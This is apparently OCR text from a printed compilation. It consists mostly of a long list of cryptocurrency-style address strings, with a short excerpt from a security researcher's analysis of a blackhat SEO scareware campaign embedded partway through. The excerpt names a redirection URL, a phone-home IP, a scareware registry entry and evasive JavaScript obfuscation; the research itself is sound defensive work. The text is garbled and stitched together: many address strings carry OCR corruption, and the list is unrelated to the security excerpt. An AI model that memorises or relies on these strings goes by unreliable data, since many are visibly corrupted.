1GvF9STre1lnzATvdYFHPpjfhs8LKubms83 
1GvMxo5ZLSMA2VjtdoxyTSRNhbgUm8J]Vpe 
1GvTXqgXok1j8QPg6CaaEvLmPvGw2LeBLo 
1GvgRRnLpUP7KsLZLE23ridD45MUxHOoAJ4 
1GwGvJJwrndpseuc2NmZ5U4Vwb8EFrgZbG 
1Gx122WnxvmY1LhtLCJLLQ6Bk2UH 7W2SH3x 
1GxMDCAFPy3LHvs9ynfKEN6jXYqoJ2L42V 
1Gy55axqu4kCRBX9Sf65 7AWGBrqNLZeYcA 
1GyBb5CwE1wBZadmyf1A7G19iIKQGEcRZut 
1GycUL4AWxy5RwSRhxmHmRTxfktYLAg8RV 
1GZJY3MQQMHta5kMkSBGjxT6QCCRFaq7DA 
LH1L9bUjyYCtLDHxtnLx1Hqwat5xoeA5DP 
LH1MKbhhpkcilsy1l6vforFcz1liPQLZbWXj 


1H1rfl1DgPA83wWWaU4wpeJBMQTCWwZUTmu 


LH4CLZMRsuoLftix6ZojB85PZp 7NRCrFcz 
1LH4scXfteoH3zxXfpeG292w89sqAtNRGcKV 
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LH5GtUx37VD1CENkPWGDXjyNooLrNTynYT 
LH5LN6GjE1gxsz89Si97Plpv5WyZW5EfP4 
LH6E5LEob4y3maookAW1WaqqpHs948ugm1RG 
LH6qqFiBP5xxKwn8JAvsmCNRsSKPV76UKEH 
LH6vkZ8QMFFPPMHPxDs4nZ52S6UNjDEQyh 
1H73EDQqt2CS27UVstfVcgqDCrgtr48vUG 
LH7BLPzt9qznfzh7Yy4btcBmgJ2TMa5eRV 
1H8t41sgauXUa4uRMyYDCA4shagnxKMrtC 
LH9OZ3yQv8j2cKAjp6BzWb3NbTgApGkGUuV 
LH9fPaEnhwkS7udXBuUzZBQxgutNm5CwBTt 
LH9IfE9eESGbFZKQsHzC)|F5uysnoZveDyAG 
LH9mnjF5TMRPW7AWPpjyNuEfbQ5Z7KGY6i 
LH9yR4R7gUixpYr45jxFYThSWecAoYwDQz 
LH9ywazYixRWKQR7MbCF5Y1Lh4QC15tQgWN 
LHA4eM2TUubymhipL27JxpdsXmuu2TNpWE 
LHAJtwFyZ2vtcTmM5GKEYjS6wf7sqfYUule 
LHALxvh1irPPTSEc7V8J73NcCH5uF2ZRdQp} 
LHBHFwRVuYFxMFpjh7RQYaMvP99gK8Gnbc 
LHBpTkcWfWxeg6VBrF3JPCDyrsLcbRuxzQ 
LHCCvJ2V14hiv2bXToFeApA4ZKCW9w6HqQ 
LHDbEiVzeegQ9HAQ9V6veQC2euQXpLyeJAE 
LHEHYea2HybPvAu7J9wbhgiuifZmMMR75T) 
LHFLn7JP7FZrufvNKKQPEfAWGjKUdFZEmy 
LHG5ZsTTRxrbwax27q3Z1F3dw5gnaTCob9 
LHGMAocHETC8JBjqVNm4i6eNPQZE2 pKjSf 
LHGfuxbZjP7hTERYE)Xfr39tDbB4AAo6ji 
LHH3BEv6MLqB5SpM5tD3AVcA47YH33MQCi 
LHHAayDHW2UamYX9dHCS5nRvbqb6YhVF3B 
LHHQNj1SAj4AAP3rze4 TaEA940C6CYowwQ 
LHHQyz2Usc5tyquUaWLSX6GP1T6XLrhxsFY 
LHHpbAUgWKqUPsjyuug4J3xsbfW855Zfak 
LHKSB2E6bTmZe4J8beY72xSXPTUnuFWSBY 
LHLTQK5zZEM7LwjqyoXLd1DqmZkAhjam8kS 
LHMWHzwQmRK6AnJxKC2ULCWgvtGWVRcu5p 
1HN1r24sZ79yTS6pAczzyCssCtL8UsaqL6 
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LHN2abhn1VHUNz84m9W3stsNtr3dKPboyh 
LHN2wrDx5tdaP938zyLuAUgSWMzmzDhPPv 
LHNTQeXTU8TWL28nZHfLSTDQR5Cn6YZoEXx 
LHNeHtRKuK73ZYZqTZHjJNmMbBvRjvXwnqtN 
LHNj5T2ezZ6Ypx5KtxyY 9tawq96L4tXsHgrC 
LHNn6ZgbcxqtE5RBLgv2ED6PVaNy19qMyG 
LHP9YbWxnpWfaq21GDMNz2mAmFrL8S6FCT 
LHQ5t65G4GHHD6GdhhMV3ZUuPrsujrF1UX 
LHQEQC2h6Jc7ZbTGSh2cYKTSwT Tlai3UmMZ 
LHQR5fZJPVffcNzGbCbapxw7u2hJjeLM5 
LHQTsE1dpSKzKu2LRcfY BQBUGkj4MKn5u6 
LHR7cu5K79QQD45jXnPGFMH5SGEe2BGims 
LHRAjKsw75LLAQ2yEghZCYjp7j5E2G4hR1 
LHRGZAmoPp2L7ySshPNvS5SgyEW3acYBRs8 
LHSM5o0kvo5yWbAqk1ZE9M 7askPqwxCajV2 
LHTRw3at4x9f5MZBUH4BVfVwWVfEckds7RJ 
LHUJwK2ZEYqXyVeJ9pCm9byNCFwtSoaWFr 
LHUdNXEnkqT8kabY4wwr9qHSxahqnwGtqG 
LHVUZ75jAZJMZJujoFDfFQXhTZn18QTbEKE 
LHVidSVYocx2kuELPfRDTgb685S5Rnxis2 
LHWXuBRWUagrcu31ZzWV4FEEZHnvFUmLWNa9 
LHWf4BGsxXb9JXwLMK5MUqnP9KxFYIaIKkM 
LHWgYnhtNrjyg8gJH77ejqrGRFmktJpyJT 
1LHYDwtwtotSedCDCHDcgbRks2a/7yPcicwd 
LHZ5AFIFBZr6AqsaXkuFrtNYdAZLsBzesQ 
LHZfyTFEyJ3PXtgPGRXjBtvKx4d9yqj7j 
LHa3BVKsM16bWjrartXNRp3N91VidNifRT 
LHaFiVWXoUTW2zzfEujy952TRdaxad6wgkT 
LHaQTW2wyAuMRP5Ukq79mBCbCZjBbC9ZsL 
1HarJpLL17FYRjiyJawFUhey6pmgKrT6zx 
LHbRG6j VDUMBb6Gq9yAyAj9cUhh4DD7eVxa 
LHbhDFq5NxaWaxC7Z9785D5qB2MjFalQAH 
1Hdzg37giYsErzGeG6vQbpyW59PMJ9ONiPV 
1LHeB6bTCdprA9P4cxvz3vzkKXXHBD6HmaET 
LHfvfism75SDRIc7yE4SU0NJ97XefmzF2h 
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LHgvfCHXQ9KeX7QLDzLkfviVnhG57j503Z 
LHhP6yNeAk9cU7HNIF4hL3NFFIci|AWMCWH 
LHhWFJPrW8hnbfdHWfZTnkB5FipLEpo9o0g 
LHha9YS6qCR398R934QwWAPBVWrwomueofK 
LHhafQbd5LQ6TtnACvYsrNw5qBGgzDtoeT 
LHhjGxZGpRK85vyh4mUW7rk446QrDr8612 
LHho3vPPQiEuWsqZrrn6kK8R5wlHvv6gRC 
LHiKGmaxiKux6MwrLQvG9GheP9qLFfFt6o 
LHiQxSZZ8LD7xAPpYfqgWyRmpgV1WMPUUE) 
LHizJDBN2wiveQUaGPy4m94MjhAEmyyDCp 
LHkm2vdkkfnzCKiy2ktwRYr3uFMRnP9wiw 
LHmJEt2ToEXMB1A18MRdwW7G7DDt3EzVx1 
LHmK65Xg3qMboYVE2w3VV6WPojo6uwBiZk 
LHmqMaHSxYrMuyCR3smiNMTb1C5UgVVim7 
LHnhqn6x9HZ29ji lsPBZM9HRCCPVWsqCgK 
LHpMqmsa3cSN1yUMKxcGrr5bosNN6xuPmh 
LHpXxTJ9Q9cCE8BnXzZPWDY2c5rfnVV5XkM 
LHqo6JamqH7DZ9ehDfQGu2Zpbrjr93Nh5r 
LHqul1KZtyJij4nuWQwN2xDGe7EDF8u6PzS 
LHrNmo8fYSfhtHKdSt8i62VSaGUXr5pykv 
LHrfEqBuJ UouS8yHTgsPB4BgK2dqqmBF8s 
1Hs5sX 7EBD6M6STru6ic23PP9RPUHRrhSt 
LHtJCPWp4Dq9CHfYWHgH12eQigLr91VfE7 
1LHtPgu6eZjyfYyEbJm9Uzttsaqc19kgX1t 
LHtqeWmadftVtEQtrhmqhH6G5Wzs7FsaWwCx 
LHv3RfTu8dje4JYsaiVMohRVgVuhetd3yB 
LHv4UX9XtphrrCr19FMr6JHdipuWRnPrp5 
LHv75gB3abq2SGijH1Qc2LdZM99fworBqw 
LHxews6gEBZHY8AUTb9b4QVFCGj9APHdLk 
LHyTkVyv68rBkYozaLLueMNfGebDCpAFVZ 
1Hz6unDLWUZdsNfgv6t9efPeBRXe4dq8DT 
LHzJ2tYcd9L4SmfuwLYqxXqCq7YrhfC1M5b 
1LHzhBwags5h7SLB5svUSvu7LbhPcJgeGbR 
LHzpEvCu8g3eEJanSQwUKz3FCDNGP8kmFX 
1JleY2x2NvVRrfLThhkaXUr3ALtyrdnZpR 
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LJ2Vmovup63TKjFj/ LT RxKC4h9YjFJUsmQxXm 
1J3FNaCcco8HEJipmG8cUVUWCM3)jEEEZW 
1J3Q2hASKw6UnsW2DqqH8v89Q6MvoxTBmxX 
1J47LA7LGTY719Raoo8HT20XepxSmggogm 
1J4CTe24tikK8pPCE9MXzJ8dMFesJhpnm4p 
Y4DKQYJo3TgmY3A4TUGYTvS6STXmwXayz 
L4NjAu4uSqC4reEZS2PDAN8NY7WTHB34M 
1J7Vxw6K43ttxuS8NSisQzcYRB8CVUqg1Li 
1J8AnmS2KafGGCCzmA3aErzFxPceab4ssi 
LAQYtWs8QjTrGJopdEpvNAF7UsqwQ7HJC 
LAQgDFcda4iVFQEdXsV2FqsobdEL6gZUH 
1JBENaTQuwAU2d4G2admyKwtGFzBbzuAWc 
LJB85PHQTYyUya4vjJpDFCn77C2rdYwapjL 
1JBC7SjD1KZP8vz6HiJvDsSMUKBLB157vhA 
YCMMHvhV3muQ86TQwiBB2dFVo7wwcLNkk 
TCYLLp5RL2VqvcWnniUfYE8v2Zf7V7SWA 
1JCrskYVpB3ipxfbLE4ky6F2KQyBokTjz1 
1JD8ANZT6nNhCducq27PZy8udCqaCDeQry 
1JDFDwJSrL3wkC2TXX43Lm6kg3nnC36CY9 
IWECXabQcW871d9vYRZTNQ6z21RMvELnSZ 
LJFcJvSTikKWqVFkmiQ2E81P1e9CozéfjYB 
1JFz4jcJyKdoJfEZND4MCmabfs5TzZRS25k 
1JGceV6W7qZ3q1rPvgom1fxXPSi4srWCZee 
1JHOHW4PdbM3DsVquq5nVxL6Mo6fcDeFhA 
1JKSooHr4iqbP1E8V5MDxxcg5DPoYdHbx8 
1KpiM5qp5hSsjks1GmcpG5VjysgbuaEM7 
1LLZXrzs|xZtxHZALZBKhqxKHPmJZtS 7eKk 
1LfBE1LaFBQfj3xoEokxyUcQD31MhAxjWb 
1LfFEB7dNznh8rCC2yiUqdUzZGjA91P3BBz 
ILrDt304tChEfTiBh3PrypoAfDyrNwVLy 
LJMWCrwWE5G86Ucz3DoMKrgepi4uht48RF 
LJN8FFLQQiILMCx3y78PYRThaNQLZHRK8rW 
LNNALVIAxrWqPGUJ3z3Hv6mpBcK8tH1H 
1JNpTbXQNal1Bxf644c5fBQLHKLmXbkRRhA 
1JP8hiFQLSHFDvp3CxjiYCeC4cgxdxoacs 
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1JPAMV5Bhz8kxEVCUPWWAGEMRajGYGK65h 
1JPmyfUYidPnRKiIAFVMVTmvmCFHW3jpj96 
LQCsmr9ZF7Pg9ZUxbjVZjN4ZHdp675H]F 
LQUWGq9ZK7xhnCWgqB9AXCL2RPqiJ9Sef9 
1Qk2ePbwGvifWTMKAH4DQsQJVP2MBz3Vm 
1JRFHSKeLJNk5xditGQNMPGHsjLHHukmdo 
1JRLTCR448KkKAKLYYNVPQmnGPLAce5HjCA 
1JRpeW7XZFLEFrYNgPotbXGQNEdEBZMKPG 
LJRUAGNVc1jYRZftidM2aJFCEpqb8ToeCp 
1SKqXke8RGAQUHM9cMHZggjuxXYSKmP8n7 
LTEjiizLinT6GbvoW52Abmg6rV1KyD3fw 
LJTY7HYaeydfs2FVXp4pPYFyFxhe9Z1vD6 
LUn5wgKTuFUYhxkJkb2LrDqj1lgSNozET7 
IXZ8mMiIRMN2zvfWcBb273Cd7gFSP9cnKgY 
1JXj3PHYJVNriS8ZBPCgXSq59ZheNWUTTR 
LJY5Q9Zk84pPm9eZJZF7LOEOQWSO9HNhwWGV 
LJYYZNHDaGC7noiE4eKatuYA4AThqVocDd 
IZNLrnDZgjfRZuzDAcr7DRYe9acdEaghR 
1a23BxhkG1Luf51uR5BJAReFNoSXcytK7 
LaomLoCqZtXkwTNvNjjEoRnSFeTRTSjiC 
Lazjdn7oWsula3c6KFxdMvu7kxiogwUQR 
1bamxLDXC1C6FJLZbxJoUQR644ndacVZL 
1LbzhcgxUHRfZNL8jkKZTGR9y65G3jR4Jx2 
1JcSo6XzXdadxpEbDNM4DCD3LvrbUjhQWCX 
LdqZSp43FMnYRiSc4t7PyXxXVztWx9DLv6 
1JdzPw2wPRSwxfipqjDGSNy69wx9vTAFFz 
LeG1imYg4n1SQ31CWsTiD1E1B7KTnbdkh 
lJeWDMeegqNSL4Ts8wR73Grjpt5swexGwT 
ljeoezmWeQY6iq3UQK39XYUQ9ZDxM5P1yP 
1Jf8jGtZT4Kok1J 7W1SwWWGNP7J2hraXGmL 
LJfBLZuiSicsqSRU39EV5nSRw4a2RfUcex 
1JfZDVKAjPoh28yRMWXGAhpHLGSKRRFL6A 
1JfvEXSysyctosJd9fsKTrYP7hk2a3kKjJ4V 
LgT2UWr8Hmv9wgh5GyEeyDEYVAhINLixS 
LhKpjY3vxufs7YM5dDaowdqx40d77dg9b 
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LikKPygfZ3JNEBksJx78dLnrqUL75d8wP6 
LinTXKrGpw8WTk22f7QmMURVQakLfgM9aT 
1Jj6LSpMUuzQR7P91eENJ2M9mpiGkZwByuo 
1LjeScURt4zRZg2hoslihbWkd5vo2YGAyv 
1JkJDUYvS70QiFeLy 1ALefVjvAHiQu3yUL 
LmMNTNxJgeJS7NhFdbt4VGUpg5]jqYDUyV 
1JnkX7S242DHbCW1yLFMYDdSZ9HA1H6ZMD 
1JnpFBrcFuZkoA1AyFGPYanSK733jmoiCo 
Ljonwn6yr3eWiPs6xVw1TvMdq4YHCWAepd 
1JpEtixV1ZRWrgFrwicAkdqTRKCVBj6JtW 
1JpNaRNJsL7gjVATO8NWfHVNgjCF1StksC 

LJ pvpi9dyWGgNXy6rDefkUXcPkpNSrkPct 
1JpxzV14M6Po8FjRgbukZg6y6NtWxP7Tvi 
UrJZwmpn5xGJchM8ohKxKpYk13qDZ4BCq 
LrYNuMaE4VXKrod2gA9keBo6nzPvtaoZ6 
LJsY5UF5pjJfEbFkyQUZFPQMUNcaZVH5mg 
1lJsoLvUjygGgLZHDJ3nQtvQn5m5gFmJ6CG 
LtKM5GKex4Vt9RpdcegMR2RqYF3yJsbZ 
1jvGjBUIRZk50pK27cDm67xxnB4NZyyqYt 
LUvf7yjyVX3dMkh9vsFUX8CgHAbUEr1xJe 
1vnMoZMbhsU30xjVzrCwrn9BnaLpMxx6q 
1jvxDDjuyHtzZEQiUHD1bhGEUaxRNe2CafP 
1JwAF3GaXDR9OB8bLwgKCUoaU3PhFDDDCKe 
1J)wHAaKP5skg6pDzj6p5jaaC5DrTQv1CBe 
1wHDAoQtTkwyjvtDZ6Nh14Jm74QVGNQXZ 
1Jx8vN5NGc67DJkh3fMURMRCbHAIKgmmVC 
1J)xoKdqe6roddYoSfiDhRfbsvZ7 U6AqGFcX 
ljy898xKXzgT4bijd/Aknah1DNohT4BjWRa 
1Jz7Aosfm9VJNK6PLMsihhP2A8pBziGTZh 
1JzFyTHLZCrFnUutFMaZ3RKLouDnccyt4R 
1ZHrzuBfVwmAJjiu6gpNzYFgmuEcrDi3f 
1JzUjuK1s2uPaLvpPvnZFLg5EY2wr7zETf 
1JzcY32VErbThnEnila8e3nevtHVWGSXWM 
1K1165UWzp63X7slwwHo8MgkCxCMQD8hj2 
1K1bqapx9fqoUQFt3gAi3YwaGs5Ginwfeg 
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1K2VcKcbdz9xcwWPuB9KEqzsyMoyNq9aTm 
1K5a5frovXxBXNyMyWs2kMo3iWGtpGZAot 
LK5qTKV2Dd63yV73uDJUzi7YVFW3g5NSQB 
1K6SQsyoPZyyfPsmGhYH5Ermwmdésj5RZi 
1K6SS3BExXUHqHsb82GyfF3FOPE59DXvkuH 
1K6q9DZEzjua3nKAmoGQ1BQYmyY4SmfVfU 
1K6ue25zmMKYGxqdEhHN7Bjoj5hkpmd4Z1yx 
1K7Su2uiHAbpvN4e7MEdRTDXCEVrmZMT1T 
1K7ryb9XbND1S7dB2nyLpe7BUaLbs9qkN 
1K7tjaxXSfqBx2HFjqH3Hjrk6b5z5c5sCs] 
1K81FeS3TH7DkqrMECtVDwXxXruRixXPXa6dZ 
1LK8iIBHQgRFRFWVTrRZ7QNXvk8jhK3ZmFAv 
1K8yBgHdCJmaTiQzmg6gzr9pw9EeWJPFPW 
1LKOUTK4zujAddGbFosMsrQ4C5MjdncRnDA 
1KA95Gp6wnmUVkwbpcoEX6Bdyp3HANmhpu 
LKAiiIDCp6nZRVQB3kL2cJCkgQZyhY7J4rv 
LKBrZLpAi9ECQH6SaQgNXwTb5t2JZieQNs 
1LKC34tXX99mapmPgTznk8Yt8bDhrTv56cH 
1KC4fqWPviveqGTkerBwnUwVXvRuQkZcdr 
LKCKhRAThH9OSxWT9y4CvdH6jyatyHAAnRaa 
1LKCdFQTGzrbiMyhVhuUoi3540fC4Q|MgZWw 
1LKCuNyiXannMAuDc41UT7JaYsuDMmQ9OWCT 
1KDE3wKsPDGYMGEYcM7HGmDk3v3UiC3XLS 
1KDVsARG17jA6bfy6UPVJo6pcmDPCM7C3s 
1KELKBbKgWS7ovVF2GWP1PS7xdP83c6QGe 
LKETUYt6PyzcKYyxeUexvZaEYPxPqT 7fgH 
LKEWC5NQM8ZQpnjghMknbySurXfJZfZhZx 
LKF7w6QYn3CNEK7VCT97wgWopFr4xX9k4JM 
1LKG8rWYWRYHfvjVe8ddEyJNCg6HxVWYSQm 
LKHPS3t6wyYaVbK2whxqw8iqAh8QKs4mdp 
LKHbrYNrLWNhovDVfMDGgYFGRPWu7QBY]Jp 
1KHyaPAk4GjDwaQLsyGek1p9zjvXzeAqhN 
1KJyThAPy7ngQkgwsFDd4XeaxBJ6xnTUyR 
1KKA1VvgPKHybsuc7RJWXTtZEcfKP7o1Tf 
LKKCjJTM2qYXYXUH 7zoinDxhiv4Xv5bTdKC 
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Let’s 


dissect the latest developments in the ongoing blackhat SEO campaign, list the par- 


ticipating scareware/blackhat SEO/redirection domains, the various monetization tactics 
going beyond scareware, as well as discuss some of the innovations used in the javascript 
obfuscation which makes it virtually impossible for a crawler to detect that the site is malicious. 


Key summary points: 
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U.K based hosting provider Web Mania Hosting appears to be compromised due to the 
fact that all the abused legitimate sites are hosted there 


the redirection and scareware domain/binary are updated two times during 24 hours pe- 
riod of time 


[4]the [5]scareware [6]has a [7]very [8]low [9]generic [10]detection [11]rate [12]due 
[13]to their [14]persistence in [15]updating it 


all the scareware samples continue phoning back to several domains parked at 
78.46.201.90 


the cybercriminals have introduced multiple monetization tactics through pay-per-click 
malware-friendly search engines 


a central redirection point (a-n-d-the .com/wtr/router.php) used in this campaign was used 
by the [16]RBN/customer of the RBN in massive iFrame injection attacks abusing input 
validation flaws within high profile sites over an year ago 


sampled scareware adds the following registry entry [HKEY LOCAL MA- 
CHINE\SOFTWARE\6A36EA6E11EAAECDF5E540D EF2149079] plxxh = "Dujaq!!" - Dujaq!! 
means "BI*w me!!" 


the blackhat SEO gang is using a unique javascript obfuscation which | originally stum- 
bled upon a couple of months ago while assessing another blackhat SEO courtesy of 
the [17]Ukrainian "fan club", the one with the Koobface connection. It relies on dy- 
namically generated code spoofing go.live.com and rds.yahoo.com random URLs for 
evasion purposes. The only vendor that detects it is McAfee-GW-Edition as [18]Heuris- 
tic.BehavesLike.JS.CodeUnfolding.A 


1KKgbNYeSDL6jUaSA2uUJNKr6u97R7zgh6 
1KLrAxMqAHAbtbu5bq2akf88HEuXRdQPn]J 
LKMNnHgvEx90Xwa/7cgbnNhBj5QttViFuRW 
LKMTKo5GupmkhLGfLivYFbYep5m8kQhBjy 
1KMueJKDLKSTY3K5b5NErw5JY9vK79rBWu 
LKNYvyqXx6y2BafffPF5yKPAMEmMQP48a62y 
1KP72fBmMh3XBRfuJDMn53APaqM6iMRspCh 
1KPk8meRrwbGbLxsvJLAUvh1u5A8n1labN5 
1KS2L1Ap1uBzHy5nzkuh2xEmV6GpVyUefT 
LKThJNMMZzdiE5E3Aq515RiIY3YSMw5QFBM 
1KTSo2SSAXKGwcTWBYqA5fiMQWFs3rY¥d2m 
LKTtSAUL58hYmkAR5zkuUR6vu5KKDi3QBx 
1KULpG91DnqMwtMoamdxggrDC3Lh4WUzXn 
LKUahHwtWQ5DpBExiYzVgc9QbgaHzvYUQk 
1KUsPiPSqprvsogN5emKaGBFHSEixi6bbw 
1KVb9Zg9T3GROJWoFJ18TocS5wXMctqaapz 
1KVsKqt6uKWzFbnHzmmHYmijsvzft9zSRWw 
1KWvcUDNAC4FafslkwFKGWsYZjj8H3tqp6 
1KXw7aJR4THWAxtnxZYzmysdLXVhLfa97n 
1KXxjC3JZzXSPJVgky5Ygur2N9eowN5ZDUA 
1KYyx2BnFagfGs6dw78MirxXFzhRhQbvtxP 
1KZ71xADMRV4SsiH4KZJZkBov4vqThrqELF 
1KZCw8A2Z6jMEtnpMrLAHx9zF6LAgzbFGN 
1KZJmBSpY5j6KVHDB71qpdy2yG66S2LMKR 
1KZbxeYHKsvMXuFL9tSiFA7D2iZcnzLq1j 
1KZgYSrL778ebrCHPbjvjwFxMMZfqjZk9h 
1Ka3fGxC3yYzgwPU7nYkma5LeSAAwMywDn 
1KaBMJgWgQzQumkteMcBZDjjEKPvrHQbQK 
1KbRZ2QxVNPHQCTSFENSDjgN31uZjJiomwi 
1LKbk5XCfQd8drynpQQQoKCw9XUNDkgNBIE 
LKcNZCycxX6fxnZxwuG4YtZN5Uua3nk84R 
1Kd81bHqwHwhgivPraatr25VRuzCdT99QK 
1Kdg9y59pFMzxX6uJ8acTvpAXcGugoYGa4f 
1KdxBTQ2GuAstqWSxQ7SRMmDXz94x4eEKE 
LKfCVwSd89HPQnPji4u2gnaJkpCRpfFabE 


25233 


1KfKAaePSrdg5B9z6aeThPbh3Nak714wot 
1KgLHrVYaPXXSvENAEgj982RcCBGN1Zb8Vv 
1KgziGcF3yfzr7MvyVQbnCJjTJsR7KXf1f6 
1KhEGeejoPGr1U5gJhmjgp9Q8omk3vXsgC 
LKhHHYZDVPTiXScKqDAKTuz7rEMtUehGBFK 
LKhHN785yEf6tUQvfupqiGHjpis9pZQFCAK 
LKhHNGE4RWBD]JVZvMva2jnDWj9TuozGaqjek 
1LKiXNS9CVVKpBHFFZHhH5CsH8cZCskD4AX 
LKjIQ5Sh)Jkf6opLWszQyyFf8johpqvjEZg 
1KjGyd1iPPZ4rDJflqLmd8mjemfVuP497y 
1KkzELkKHnvnHgz9dRau49PUnNUEEgwD2N53 
1Km4QwBnppCULZeUSmaJMV3qVi7sQmCtKf 
LKmMDVfUNYzZ9uUXqvDEpRKUDEhTIbA5fbv_E;j 
1KmRwzdHZRYvZExj227CZUW5EZN1ncYLDj 
1KmhrBga7B7MMHgJRk19DYuh7tixWa4uA6 
1LKn6UMrBLWxoXaVjGWbEdpi2jN1Ttut6pZ 
LKONNTLXfnTC4uRu1zj84qlTnm7vgV3zih6 
1KoWdWogof23bRvcVqeEBYadUaTAadQaqfo 
1KpP1YGGxPHKTLgET82JBngcsBuifp3noW 
1KpSjZtAGZwGk5Lj8FUCHTTtoxyDUDjD5K 
1Kpck3BqiBXBM7S840F2kePUmMGNeC5z2wy 
1KpxteDPSDmrqFCRe92ywH9TXxSFFxapufV 
1Kqbj9Dejr6SngER8hcWhkscWpJ3Fynsp2 
1Kqmv6Uw2DjovGgY1lmLjp8LBZZuNtK9GWL 
1KqnMRZVJbpfqgAUGga2ne7X8FbQpeTGYMW 
1KrPwqRx82HK6LHrvjX1F3FMM51Vy290PK 
1KsnG5vE1un61tcZTpyuRCpmXyqwNxHPlii 
LKt4UHpTWEr1cbjja4b73f6TqLFoxX4xbkK 
1KtShe7d37v5S8BCbjKi6tXsRNtKNJHYXB 
1Kudq7hKLzqtikyRLnh1GJo57VK7mdhBPv 
1KukQdCdwfbudsMTtrsxwpbKDpKFTvoUnE 
1KvSpXfGb3D1jQP2xvE3dVsAt2bf] Dupvk 
1Kw9RHVtVEvw5D6a0ELKh1QQztQ9hqCoPU 
LKwwAQm1wQ8sFpRTiynPbDJZzZN1VPmfgc4 
1Kx11YZFHpX69Xh6kbwudBTXaxcVpmrxnUu 
25234 


1Kx9ZzZYSWzVbDTACGAJVr5L6Bt49cDJH7v 
lKyWVek26VQjRlyTG6cb2Agi7eEoK8Wg3g 
1KyjEXEBfRZ9Nnysky8naPRalJBZGDzySA 
1KyyQ6ikCRb1w2K3XCRGHb6rvUD3pP)xep 
1LL1cKfrZMjqwY4aNLucj6rcGNmFR2tCGE1 
1L10Xo030jJYMHrBWgRsql6cd2kgeYsaVEA 
1L26pZ7ziE7f5BYC5GZq2vB4y6S11WUKqc 
LL28VkKUZSWv5mCCflrnShTjPjoUtV8YgzG 
1L2RpVQgrVL6KTDKWVGyC6LpWaBJFYJnrd 
1LL2utMw]JjCCYr8FHZVpvvvatLP2SHEGijry 
LL3EtyjRnvAjwEdy4ocE7EyFDX5YVkKD7U4 
1L4GeXhRwbrYRftBhr9SLu87zkuB4bdSXK 
1L52SBSi4qnDp4z8SNQ6d35rY4EXMQeR1 
LL5Vi4poR8vv5kQy4Va7H3jiqyiKWXEEDP 
1L5qsPNwsXKZKHH7SmQVyDRgoLGNRRUtTD 
1L66AcnbuZkYjs8eE6uVbTUxmorHYGKxF] 
1L799PZB2cK3xiUPd4W8tPuiqkNABVqrA7 
1L7SLmazbbcy614zsDSLwz4bxz1innJvDeV 
1L7VfuceoEA2UeYavmfVP6zV8znWjexYYi 
LL8FPTKtPAUW6XuL7MXTTUP1IsDcY7fGWHN 
1L8UW9KwWEKGvekqtb2Ut1583E418fFyXZ}J 
1L8n4dEDcBTwLSaTREBymy2qhNRR4LXYws 
1LL80xh5WvVQPbanvjhoe2YZpjUvv9trAD4 
1L8urufM6h8p1q2YjiowfNKaL3MwSWkhxm 
LLADnzUZK2JV5XqrwzNdqQ9WCXAiRBXyRB4 
LLAWBSMW6UxLnpAn8gji64qyfFkKXR9yT8p5 
1LLAdCnNLUDMM4sixvhCbEaPaS6DjB4w3r7 
LLAnPM2y1QDWfMKRgYM8ZK1UvZ3un7LUZG 
1LB1D4kKvFq4ZgUyU4KdQ9UreYzbZjEdkq 
1LBx5h7r3C5AH48vzPAswQH4BmxXw8tqG]o 
1LCDP6YFBsfPZTU4dSsDqTvsv11WK7Cd3G 
1LCExVA4uS4VxehkWrR8StQVABKM3LKrje 
LLDBuFZGfWUDCHQ8ghcKYMWGYp53TfzzvD 
1LDtyZB6Q6Mb6x2xFv2JyLebsjkMjCsPVY 
LLEbi3sufoAeNhHCULFwZJqKKQRDQXxXzgKh 


25235 


LLEcfC8Uy6TcibjZ1wmksB3n9XvrDDuRvy 
LLEg4WmpCrqBd7V3PywE2nvFUFC3QTe52x 
LLEr769JeAjnelc9APM6J26uLpx4a5jLin 
LLEynRAXwDCMvV7BW302v1ErqmemaB3vDm 
1LFGZB18QKUtY5CaBpFPHBk7NqxsEvFsQx 
1LFWesCyQsyyxbSpq319PsdNNqN9OWXbXoF 
1LGnuv6KX9SXB8eM72dnBAcECeaC8Z2zje 
LLHWrLY6jiyms6PEgJESFUMDVAvSqwpa4P 
LLHj2XmrWuZCDQnf5jtSWWeoapH3xTogQF 
LLHoRyd2DPmQJVhQEWSBKjBRugfxeAic6T 
1LJYvsZmTgDXBaxXbnusQP1lbW7FCUWxdhUX 
LLLEkK5rnLGPz4KpuNkhugyqh7Ht18Lq4xj 
LLLYVsnYg4J3AP7YQUyVBm9SZEHwy9zYdB 
1LLZXS5A14s]JpP7eUZ8qPUSdK19n1lotNT 
LLMYSPR7MMAriQRHgAaWCjxD8aNCfsQEEP 
LLPAUi1LWzZCsRLKGFWFdN5sENs1LufBfNp 
1LPJ43XTMNRbuFn450bhnHkSsgSy1NyryH 
1LLPXS27yZAWhYn3idyPQ5tSEuomaql1dDeH 
1LLPgKoErPUeM92SDY5axJzYCdQbeiRHD6i 
1LQxrQvqyZLLEHwUrJ7jjpZ2nWizB75Ndy 
LLRCZmgNkHi3nBG6zei3a4SsDptDPcVLmH 
1LRSaxiQwCuuhtxbNrfRXnc4Hh5vvMWGjT 
1LLShH7SH9zjszQanPJjxvQhRRrzUiJp7gYh 
1LSmJuGqXw1sqbCHN84pjZR8aVmGzBHucA 
LLTWu2kxWvefMyDkAJaciVGgJcPPeSqbGB 
LLUGow4mMAKjKR4t53VKPaC951HJD3dRAa 
LLUvJR2CfN9nvYFqCJGGzZBp4Rpwm9fuY8E 
LLV8hdp4rTfRESUT3FoZhgxnSW4xthqpS3 
LLWCpuGMNW764qdgpzPS6P2B523uafVa7a 
1LWMBSBv6Ne6YdeGJHRmv5p9VuSaEPM3iR 
ILXDWUS5KT8XhWMDn3VppQ9qDm1MikWvMaE 
1LXrSb67EaH1LGc6d6kWHag8rgv4ZBQAcpU 
LLY58fiaAYFKgev67TN1UjtRveJh81D2dU 
1LZDx1jL6bj7vzPjBFgmA4hdGVwLXEzdLv 
LLaVE1lwwzvavB2hYTRGNEdLt)jJLdQerih 
25236 


1LLadJCTaxJb 7 VF5FZTDg8uaHjVQVfpcNNZ 
LLaznvmRafzwaYyvyCNiLJyUw7PBnyEBL 
LLbVJj2x4temfWX2BaQCiaganlyusLnjd 
1Lc7xTpPQaH8sWcZ1JpqR3daewdhPDzDdK 
1LLe65RQONFKyMtxdjshraxX70Mgs4CQH3YqU 
LLfF7ZWJNNagnC9c47zZCZfeDB5cchTB1ze 
LLIYAc2yVQ5E7VA2EbvS2BtVKXmeang2xD 
1LLfsLRKwrDhikuZgQAX2uFy1rr7qXug9eP 
